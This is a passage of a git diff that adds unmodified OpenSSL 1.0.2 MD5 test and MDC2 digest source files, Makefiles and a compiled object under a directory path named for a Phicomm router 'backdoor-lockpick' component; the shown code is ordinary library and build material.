+int main(int argc, char *argv[])
+{
+    printf("No MD5 support\n");
+    return (0);
+}
+#else
+# include <openssl/evp.h>
+# include <openssl/md5.h>
+
+static char *test[] = {
+    "",
+    "a",
+    "abc",
+    "message digest",
+    "abcdefghijklmnopqrstuvwxyz",
+    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789",
+    "12345678901234567890123456789012345678901234567890123456789012345678901234567890",
+    NULL,
+};
+
+static char *ret[] = {
+    "d41d8cd98f00b204e9800998ecf8427e",
+    "0cc175b9c0f1b6a831c399e269772661",
+    "900150983cd24fb0d6963f7d28e17f72",
+    "f96b697d7cb7938d525a2f31aaf161d0",
+    "c3fcd3d76192e4007dfb496cca67e13b",
+    "d174ab98d277d9f5a5611c2c9f419d9f",
+    "57edf4a22be3c955ac49da2e2107b67a",
+};
+
+static char *pt(unsigned char *md);
+int main(int argc, char *argv[])
+{
+    int i, err = 0;
+    char **P, **R;
+    char *p;
+    unsigned char md[MD5_DIGEST_LENGTH];
+
+    P = test;
+    R = ret;
+    i = 1;
+    while (*P != NULL) {
+        EVP_Digest(&(P[0][0]), strlen((char *)*P), md, NULL, EVP_md5(), NULL);
+        p = pt(md);
+        if (strcmp(p, (char *)*R) != 0) {
+            printf("error calculating MD5 on '%s'\n", *P);
+            printf("got %s instead of %s\n", p, *R);
+            err++;
+        } else
+            printf("test %d ok\n", i);
+        i++;
+        R++;
+        P++;
+    }
+
+# ifdef OPENSSL_SYS_NETWARE
+    if (err)
+        printf("ERROR: %d\n", err);
+# endif
+    EXIT(err);
+    return (0);
+}
+
+static char *pt(unsigned char *md)
+{
+    int i;
+    static char buf[80];
+
+    for (i = 0; i < MD5_DIGEST_LENGTH; i++)
+        sprintf(&(buf[i * 2]), "%02x", md[i]);
+    return (buf);
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/mdc2/Makefile b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/mdc2/Makefile
new file mode 100644
index 0000000..1415531
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/mdc2/Makefile
@@ -0,0 +1,93 @@
+#
+# OpenSSL/crypto/mdc2/Makefile
+#
+
+DIR=	mdc2
+TOP=	../..
+CC=	cc
+INCLUDES=
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST= mdc2test.c
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=mdc2dgst.c mdc2_one.c
+LIBOBJ=mdc2dgst.o mdc2_one.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= mdc2.h
+HEADER=	$(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+mdc2_one.o: ../../e_os.h ../../include/openssl/bio.h
+mdc2_one.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+mdc2_one.o: ../../include/openssl/des.h ../../include/openssl/des_old.h
+mdc2_one.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+mdc2_one.o: ../../include/openssl/lhash.h ../../include/openssl/mdc2.h
+mdc2_one.o: ../../include/openssl/opensslconf.h
+mdc2_one.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+mdc2_one.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+mdc2_one.o: ../../include/openssl/symhacks.h ../../include/openssl/ui.h
+mdc2_one.o: ../../include/openssl/ui_compat.h ../cryptlib.h mdc2_one.c
+mdc2dgst.o: ../../include/openssl/crypto.h ../../include/openssl/des.h
+mdc2dgst.o: ../../include/openssl/des_old.h ../../include/openssl/e_os2.h
+mdc2dgst.o: ../../include/openssl/mdc2.h ../../include/openssl/opensslconf.h
+mdc2dgst.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+mdc2dgst.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+mdc2dgst.o: ../../include/openssl/symhacks.h ../../include/openssl/ui.h
+mdc2dgst.o: ../../include/openssl/ui_compat.h mdc2dgst.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/mdc2/Makefile.bak b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/mdc2/Makefile.bak
new file mode 100644
index 0000000..1415531
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/mdc2/Makefile.bak
@@ -0,0 +1,93 @@
+#
+# OpenSSL/crypto/mdc2/Makefile
+#
+
+DIR=	mdc2
+TOP=	../..
+CC=	cc
+INCLUDES=
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST= mdc2test.c
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=mdc2dgst.c mdc2_one.c
+LIBOBJ=mdc2dgst.o mdc2_one.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= mdc2.h
+HEADER=	$(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+mdc2_one.o: ../../e_os.h ../../include/openssl/bio.h
+mdc2_one.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+mdc2_one.o: ../../include/openssl/des.h ../../include/openssl/des_old.h
+mdc2_one.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+mdc2_one.o: ../../include/openssl/lhash.h ../../include/openssl/mdc2.h
+mdc2_one.o: ../../include/openssl/opensslconf.h
+mdc2_one.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+mdc2_one.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+mdc2_one.o: ../../include/openssl/symhacks.h ../../include/openssl/ui.h
+mdc2_one.o: ../../include/openssl/ui_compat.h ../cryptlib.h mdc2_one.c
+mdc2dgst.o: ../../include/openssl/crypto.h ../../include/openssl/des.h
+mdc2dgst.o: ../../include/openssl/des_old.h ../../include/openssl/e_os2.h
+mdc2dgst.o: ../../include/openssl/mdc2.h ../../include/openssl/opensslconf.h
+mdc2dgst.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+mdc2dgst.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+mdc2dgst.o: ../../include/openssl/symhacks.h ../../include/openssl/ui.h
+mdc2dgst.o: ../../include/openssl/ui_compat.h mdc2dgst.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/mdc2/Makefile.save b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/mdc2/Makefile.save
new file mode 100644
index 0000000..1415531
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/mdc2/Makefile.save
@@ -0,0 +1,93 @@
+#
+# OpenSSL/crypto/mdc2/Makefile
+#
+
+DIR=	mdc2
+TOP=	../..
+CC=	cc
+INCLUDES=
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST= mdc2test.c
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=mdc2dgst.c mdc2_one.c
+LIBOBJ=mdc2dgst.o mdc2_one.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= mdc2.h
+HEADER=	$(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+mdc2_one.o: ../../e_os.h ../../include/openssl/bio.h
+mdc2_one.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+mdc2_one.o: ../../include/openssl/des.h ../../include/openssl/des_old.h
+mdc2_one.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+mdc2_one.o: ../../include/openssl/lhash.h ../../include/openssl/mdc2.h
+mdc2_one.o: ../../include/openssl/opensslconf.h
+mdc2_one.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+mdc2_one.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+mdc2_one.o: ../../include/openssl/symhacks.h ../../include/openssl/ui.h
+mdc2_one.o: ../../include/openssl/ui_compat.h ../cryptlib.h mdc2_one.c
+mdc2dgst.o: ../../include/openssl/crypto.h ../../include/openssl/des.h
+mdc2dgst.o: ../../include/openssl/des_old.h ../../include/openssl/e_os2.h
+mdc2dgst.o: ../../include/openssl/mdc2.h ../../include/openssl/opensslconf.h
+mdc2dgst.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+mdc2dgst.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+mdc2dgst.o: ../../include/openssl/symhacks.h ../../include/openssl/ui.h
+mdc2dgst.o: ../../include/openssl/ui_compat.h mdc2dgst.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/mdc2/lib b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/mdc2/lib
new file mode 100644
index 0000000..e69de29
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/mdc2/mdc2.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/mdc2/mdc2.h
new file mode 100644
index 0000000..7efe53b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/mdc2/mdc2.h
@@ -0,0 +1,94 @@
+/* crypto/mdc2/mdc2.h */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#ifndef HEADER_MDC2_H
+# define HEADER_MDC2_H
+
+# include <openssl/des.h>
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+# ifdef OPENSSL_NO_MDC2
+#  error MDC2 is disabled.
+# endif
+
+# define MDC2_BLOCK              8
+# define MDC2_DIGEST_LENGTH      16
+
+typedef struct mdc2_ctx_st {
+    unsigned int num;
+    unsigned char data[MDC2_BLOCK];
+    DES_cblock h, hh;
+    int pad_type;               /* either 1 or 2, default 1 */
+} MDC2_CTX;
+
+# ifdef OPENSSL_FIPS
+int private_MDC2_Init(MDC2_CTX *c);
+# endif
+int MDC2_Init(MDC2_CTX *c);
+int MDC2_Update(MDC2_CTX *c, const unsigned char *data, size_t len);
+int MDC2_Final(unsigned char *md, MDC2_CTX *c);
+unsigned char *MDC2(const unsigned char *d, size_t n, unsigned char *md);
+
+#ifdef  __cplusplus
+}
+#endif
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/mdc2/mdc2_one.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/mdc2/mdc2_one.c
new file mode 100644
index 0000000..790775c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/mdc2/mdc2_one.c
@@ -0,0 +1,76 @@
+/* crypto/mdc2/mdc2_one.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/mdc2.h>
+
+unsigned char *MDC2(const unsigned char *d, size_t n, unsigned char *md)
+{
+    MDC2_CTX c;
+    static unsigned char m[MDC2_DIGEST_LENGTH];
+
+    if (md == NULL)
+        md = m;
+    if (!MDC2_Init(&c))
+        return NULL;
+    MDC2_Update(&c, d, n);
+    MDC2_Final(md, &c);
+    OPENSSL_cleanse(&c, sizeof(c)); /* security consideration */
+    return (md);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/mdc2/mdc2_one.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/mdc2/mdc2_one.o
new file mode 100644
index 0000000000000000000000000000000000000000..af5a548247fb1f109e8d8bef8aded7bc1b1ff33e
GIT binary patch
literal 2016
zcmbu9-)qxQ6vuCy&P}&v^~XbDB7NATq6=*|*bh*euI*BZ>u{?N;*4pV{a|fc+7vb)
z{K1$Q=41~(_~>6E1N{qRf509D1!baw52DO-l6$)}OP~D0;hgii=iKDpo14dJIpg>F
z2$PT8AjcV_guDqH#|bM;kbcrfehysvE#AqRzr=jj{3|ZVJHt4dmo~pnl%(yza0D{R
zObtb1d(zeigUg!x(oT7(M>4;C#>%ZdBO;qWWb=>_$vl+JPuAeuu+?o>e&N!wkJ2_w
zRgy;SiH$C+Oxk=uA)5z_;yrOuy#EfTZE0qDdMX^r7n-`!3{MK9LUbfH-n7!#qj*$^
zj$N^_-GR#tf^~t-%;t%okUeA^80v!Ui0|QT;#&{;2K%~uc45QDfM29zuh3`s;7fm+
z5AASiKKvpe@sVd;DgJ@K!behkILU{Sd@#xP(3TSp&mcg)ADtKgz<Hh!a`u+(T^!8h
zRv!SLgX5Z+IC6@GZJs0DZ8=Lg;=K&c+C^4n`}5$=Io{veD_|io=R4Tdga{q@L<gSg
zz;hkA(t(posTfzPx+WA!MHrhLkCR)e={Qkl<Xlpem0Tt>pI%TF#H5^7tRW?<uNrog
zua#6ov*XOFu9it|E<HOxFDu2ers@riC`!Xni)%`8WldR9SIY$V1qI)mbt-?3Y+bjg
z&G5_^$MvA_Wc$Gwzl#uroCjlk86gPy02t#>5rUB8{xcqi7=`bH){@ZJs2FO22o0ld
z`xO?|wX!N0+PXmmSieeyLZd;1VzpAybYObb&;+<sBi7PszN|NeTD@A+>c$2UtQoWw
zWvQ-KwALg4CkR6`-X-@JodAYn-=Ce?wJb(I2!?x;0CVa&y=uD@o&k@~VK)K4XVhgd
z<nEifkAoh<TBoi-f^)k24``A5&bad!)Zv^_TF=}84X!dkJ$pX$Q@~m5EbaAz9<?`t
z;a{We8-hGY`@;}B#rBV}0t8s<?vK*`IaWx$yMGb5*ZGAIg4j9X`C%{XXWZ-A*!P4!
r|26f!z}Or(&iYS7>^?hdoWdF=4$<ja<Say9{Zab<<yNH~xcmPBa%t98

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/mdc2/mdc2dgst.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/mdc2/mdc2dgst.c
new file mode 100644
index 0000000..6615cf8
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/mdc2/mdc2dgst.c
@@ -0,0 +1,196 @@
+/* crypto/mdc2/mdc2dgst.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <openssl/crypto.h>
+#include <openssl/des.h>
+#include <openssl/mdc2.h>
+
+#undef c2l
+#define c2l(c,l)        (l =((DES_LONG)(*((c)++)))    , \
+                         l|=((DES_LONG)(*((c)++)))<< 8L, \
+                         l|=((DES_LONG)(*((c)++)))<<16L, \
+                         l|=((DES_LONG)(*((c)++)))<<24L)
+
+#undef l2c
+#define l2c(l,c)        (*((c)++)=(unsigned char)(((l)     )&0xff), \
+                        *((c)++)=(unsigned char)(((l)>> 8L)&0xff), \
+                        *((c)++)=(unsigned char)(((l)>>16L)&0xff), \
+                        *((c)++)=(unsigned char)(((l)>>24L)&0xff))
+
+static void mdc2_body(MDC2_CTX *c, const unsigned char *in, size_t len);
+fips_md_init(MDC2)
+{
+    c->num = 0;
+    c->pad_type = 1;
+    memset(&(c->h[0]), 0x52, MDC2_BLOCK);
+    memset(&(c->hh[0]), 0x25, MDC2_BLOCK);
+    return 1;
+}
+
+int MDC2_Update(MDC2_CTX *c, const unsigned char *in, size_t len)
+{
+    size_t i, j;
+
+    i = c->num;
+    if (i != 0) {
+        if (i + len < MDC2_BLOCK) {
+            /* partial block */
+            memcpy(&(c->data[i]), in, len);
+            c->num += (int)len;
+            return 1;
+        } else {
+            /* filled one */
+            j = MDC2_BLOCK - i;
+            memcpy(&(c->data[i]), in, j);
+            len -= j;
+            in += j;
+            c->num = 0;
+            mdc2_body(c, &(c->data[0]), MDC2_BLOCK);
+        }
+    }
+    i = len & ~((size_t)MDC2_BLOCK - 1);
+    if (i > 0)
+        mdc2_body(c, in, i);
+    j = len - i;
+    if (j > 0) {
+        memcpy(&(c->data[0]), &(in[i]), j);
+        c->num = (int)j;
+    }
+    return 1;
+}
+
+static void mdc2_body(MDC2_CTX *c, const unsigned char *in, size_t len)
+{
+    register DES_LONG tin0, tin1;
+    register DES_LONG ttin0, ttin1;
+    DES_LONG d[2], dd[2];
+    DES_key_schedule k;
+    unsigned char *p;
+    size_t i;
+
+    for (i = 0; i < len; i += 8) {
+        c2l(in, tin0);
+        d[0] = dd[0] = tin0;
+        c2l(in, tin1);
